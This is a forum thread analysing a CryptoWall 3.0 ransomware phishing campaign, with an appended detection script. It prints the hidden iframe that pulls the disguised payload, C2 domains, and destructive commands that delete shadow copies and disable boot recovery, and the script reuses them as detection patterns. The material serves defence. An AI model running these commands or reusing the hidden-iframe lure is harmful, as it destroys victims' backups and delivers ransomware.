
CryptoWall 3.0 - New, Interesting Phishing Campaign In-the-Wild


#1 White Hat Mike


Posted 05 June 2015 - 12:30 AM

My primary article on my own self-owned site: https://www.emergingthreats.info/v3/article.php?id=4


Just a reminder to all -- CryptoWall 3.0 is still very much active, with phish tactics that I think are less effective, but who knows; maybe they're seeing great success with this method.  Personally, if successful compromise requires additional steps/execution of more than one file that's distributed as an e-mail attachment, I would imagine that the success rate would decline.  But who knows; perhaps the opening of the attached, compressed HTML file resulting in no nefarious activity initially is being used as a method of gaining trust of the targeted user...


CryptoWall 3.0 Still Actively Being Spread as a New Campaign is Discovered in-the-wild

The New Campaign Relies on Phishing
A new campaign spreading CryptoWall 3.0 has been observed in-the-wild, and reported to the administrator of http://malware-traffic-analysis.net who shared several screenshots as well as network traffic logs captured upon execution of the malicious binary.
This campaign is a bit different than others, as it involves two (2) stages of user intervention; the user must execute the initial file attached to the e-mail within a ZIP archive, but then must execute the additional file--a binary file masked as a SCR to appear to be a legitimate Adobe Reader PDF document--which contains the CryptoWall 3.0 payload.
The phishing e-mails are being sent claiming to contain resumes. An example phish shared on malware-traffic-analysis is below:


The e-mails appear to be sourced from Yahoo e-mail addresses; a large quantity of these phishing e-mails were logged by the reporting user as being sourced from different Yahoo addresses.  Headers observed within one of the e-mails reveal a sender e-mail address of:

With a source IP address (X-Originating-IP) of 98.1136.216.211.  The attachment, in this case, was named:

Containing a single HTML file named resume3606.html.  The HTML file is quite small, as its sole intention can be described best by the below screenshot of its source code:


The HTML file contains an iframe that calls to what appears to be a compromised domain, now used as a C2 (command-and-control) server by the malware author.  The below URL called by the iframe has been filtered for user safety; this was still distributing the SCR file a few hours ago.

<iframe src="hxxp://coppolarestaurant.com/cgi/resume2.php?id=661" width="418" height="792" style="position:absolute;left:-10450px;"></iframe>
Upon opening the HTML document, this iframe opens the above URL which then prompts the download of a SCR file containing the CryptoWall 3.0 payload, masked to appear to the victim as a legitimate Adobe PDF document.
The attacker has modified the PE header of the file so that the SCR file's icon is that of an Adobe Reader PDF document:


The sample SCR file examined from the above URL was named my_resume_pdf_id_6721-3921-5311.scr
Upon execution, this file launches the CryptoWall 3.0 payload that we all know and despise.
We have already seen CryptoWall 3.0 and analyzed it plenty of times, but this was one of the few times I actually got the sample to run cleanly in a sandbox, so I added some analysis results below, primarily to share new(er) C2 servers, new gateways (if any) utilized, etc.
Brief Analysis
Static Analysis
File Size: 272 KB (278,528 Bytes)
File Type: PE32 Executable (GUI)
Detection Ratio as of 06/04/2015: 4/57
Currently Detected by (as of 06/04/2015):
Dynamic Analysis
DNS Requests

ip-addr.es -> // To get victim's external IP
pinoyjokes.org -> // compromised site, C2 server
gdsprint.com -> // compromised site, C2 server
HTTP Requests
Performs various POST requests; one to ip-addr.es to obtain the victim's external, public-facing IP address, and others to various C2 servers. The structure of these POST requests is the same or very similar (i.e. a different one-letter variable in the request), but to different C2 servers:
Example request:

Example response to above:

Example request:

C2 Servers

coppolarestaurant.com ->
pinoyjokes.com ->
gdsprint.com ->
herp.net ->
canbroc-bg.com ->
japaneselink.net ->
Payment Gateways
Sample Subdomain: 7oqnsnzwwnm6zb7q

Associated Files

Injects code into explorer.exe.
Associated Registry Entries

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf (logged four times)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 687ddeba (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *87ddeba (logged four times)
Creates Start Menu Entry (Example)

C:\Users\<profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe
Creates Files Inside User Directory (Example)


CryptoWall3 // * note this was the name I saved and analyzed sample as
Associated Domains Used for Obtaining External, Public-Facing IP Address

Spawned Processes; Process Tree

      C:\Windows\System32\svchost.exe -k netsvcs
      C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Virtual Machine / Analysis Evasion
- Queries a list of all running processes
- Checks the available/free space of all local hard drives
Searches for the following files within the local file system (assumed; these strings were found in memory):

Treat this as a CryptoWall 3.0 refresher, and remember: keep your system updated, and don't open e-mails, especially not e-mail attachments, from unknown senders. Even if the e-mail appears to be from someone you know--even if the e-mail address displayed as the sender is that of someone you know--if something looks suspicious, it's always best to trust your intuition. Better safe than sorry. Stay safe!

Edited by White Hat Mike, 05 June 2015 - 02:02 AM.

Information Security Engineer | Penetration Tester | Forensic Analyst
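A small triage script, added here as an example and not part of the post above or of any tool it mentions: it runs the behaviours listed in the analysis (shadow-copy deletion, the two bcdedit changes, hex-named Run/RunOnce values, and the off-screen iframe in the resume HTML) as detection rules over constructed sample events. The event format, the rule names and the sample lines are my own assumptions modelled on the post.

```python
import re

# Constructed sample telemetry modelled on the process tree and registry
# entries reported above; these are not captured logs from the sandbox run.
SAMPLE_EVENTS = [
    r"PROC C:\Windows\System32\svchost.exe -k netsvcs",
    r"PROC C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet",
    r"PROC C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No",
    r"PROC C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    r"REG HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf",
    r"REG HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf",
    r"REG HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run OneDrive",
]

# Constructed attachment body carrying the off-screen iframe quoted in the post.
SAMPLE_HTML = ('<html><body><p>Resume</p><iframe src="hxxp://coppolarestaurant.com/'
               'cgi/resume2.php?id=661" width="418" height="792" '
               'style="position:absolute;left:-10450px;"></iframe></body></html>')

# Each rule names one behaviour CryptoWall 3.0 showed in the analysis above.
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("recovery_disabled", re.compile(r"bcdedit.*recoveryenabled\s+no\b", re.I)),
    ("boot_failures_ignored", re.compile(r"bcdedit.*bootstatuspolicy\s+ignoreallfailures", re.I)),
    # Run/RunOnce value made of 6-8 hex digits, optionally with the '*' prefix
    # that makes a RunOnce entry execute even when Windows boots in Safe Mode.
    ("hex_named_autorun", re.compile(r"\\CurrentVersion\\Run(Once)?\s+\*?[0-9a-f]{6,8}$", re.I)),
]

def match_events(events):
    """Return (rule_name, event) pairs for every event that trips a rule."""
    hits = []
    for line in events:
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((name, line))
    return hits

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
OFFSCREEN_RE = re.compile(r"left\s*:\s*-\d{3,}px", re.I)  # pushed thousands of px off-screen
SRC_RE = re.compile(r'src\s*=\s*"([^"]*)"', re.I)

def hidden_iframes(html):
    """Return the src of every iframe positioned far off-screen, the trick the resume HTML used."""
    srcs = []
    for tag in IFRAME_RE.finditer(html):
        if OFFSCREEN_RE.search(tag.group(0)):
            m = SRC_RE.search(tag.group(0))
            srcs.append(m.group(1) if m else "")
    return srcs
```

Feeding real EDR or Sysmon process-creation and registry events through match_events, and mail-gateway attachment bodies through hidden_iframes, gives an alert on the sequence this campaign relies on before the encryption phase completes.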



#2 quietman7


    Bleepin' Janitor

  • Global Moderator
  • 51,756 posts
  • Gender:Male
  • Location:Virginia, USA
  • Local time:12:13 PM

Posted 05 June 2015 - 06:09 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click here.

#3 White Hat Mike

White Hat Mike
  • Topic Starter

  • Members
  • 312 posts
  • Gender:Male
  • Location:::1
  • Local time:12:13 PM

Posted 05 June 2015 - 08:51 AM

> Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.


Of course.  It's unfortunate that this campaign, that requires users to download and execute two separate files, appears to be quite successful...


